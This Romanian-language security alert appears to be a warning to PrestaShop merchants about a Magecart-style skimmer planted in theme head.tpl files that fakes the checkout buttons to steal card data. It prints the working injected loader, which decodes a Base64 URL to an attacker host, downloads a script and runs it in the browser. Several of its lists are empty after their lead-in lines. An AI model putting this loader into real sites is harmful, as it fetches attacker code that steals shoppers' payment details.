
Ecosistemul PrestaShop se confruntă cu o nouă amenințare de securitate care poate afecta direct magazinele online și, mai grav, datele de plată ale clienților. Echipele tehnice PrestaShop au confirmat detectarea unui script malițios de tip digital skimmer, capabil să fure informații bancare în timpul procesului de checkout.
Pentru comercianți, acest tip de incident nu înseamnă doar o problemă tehnică. Impactul poate include pierderea încrederii clienților, probleme legale și sancțiuni privind protecția datelor.
Atacul este elegant și periculos deoarece nu sparge direct sistemul de plăți, ci modifică experiența vizuală a utilizatorului.
Scriptul malițios înlocuiește butoanele reale de plată din checkout cu unele false. Clientul crede că plătește normal, însă este redirecționat către un formular fraudulos care colectează datele cardului.
Elementul cheie este faptul că malware-ul este injectat direct în fișierele temei active ale magazinului, în special în fișierul:
/themes/[tema]/templates/_partials/head.tpl
Asta înseamnă că atacatorul a reușit să modifice fișierele magazinului, ceea ce indică o compromitere a securității serverului sau a accesului administrativ.
Scriptul detectat are o structură similară cu:
<script>
(function(){
var x=new XMLHttpRequest;
x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));
x.onload=function(){
if(200===x.status)try{Function(x.responseText)()}catch(e){}
};
x.send();
})();
</script>
Partea codificată Base64 se schimbă frecvent pentru a evita detectarea, însă structura rămâne constantă și folosește mereu funcția atob() pentru a descărca cod malițios extern.
Pe scurt, scriptul injectat descarcă un alt script de pe un server controlat de atacator și îl execută în browserul clientului.
Acest tip de atac este cunoscut drept Magecart-style skimming și este unul dintre cele mai grave scenarii pentru eCommerce deoarece:
Clienții nu suspectează nimic deoarece pagina arată identic cu cea originală.
Prezența scriptului într-un fișier de temă indică o breșă anterioară. Cele mai frecvente cauze sunt:
Important: scriptul nu apare singur. Este un simptom al unei compromiteri deja existente.
Administratorii PrestaShop ar trebui să verifice urgent:
În multe cazuri, singurul indiciu inițial poate fi un raport de fraudă de la clienți.
PrestaShop recomandă verificarea imediată a tuturor magazinelor. Acțiunile urgente includ:
În paralel, echipele PrestaShop investighează originea atacului și lucrează la măsuri de prevenție.
Acest incident evidențiază o realitate dură din eCommerce: securitatea magazinului nu este o acțiune punctuală, ci un proces continuu.
Magazinele online sunt ținte atractive deoarece gestionează:
Un singur script injectat poate transforma un magazin legitim într-un instrument de fraudă.
Alerta PrestaShop este un semnal de alarmă pentru întreaga industrie eCommerce. Orice magazin online trebuie să trateze securitatea ca pe o componentă esențială a operațiunilor zilnice.
Pentru comercianți, mesajul este clar: verificați imediat magazinele și implementați măsuri proactive de protecție. În securitatea online, prevenția este întotdeauna mai ieftină decât recuperarea după un incident.
Sursa: Prestashop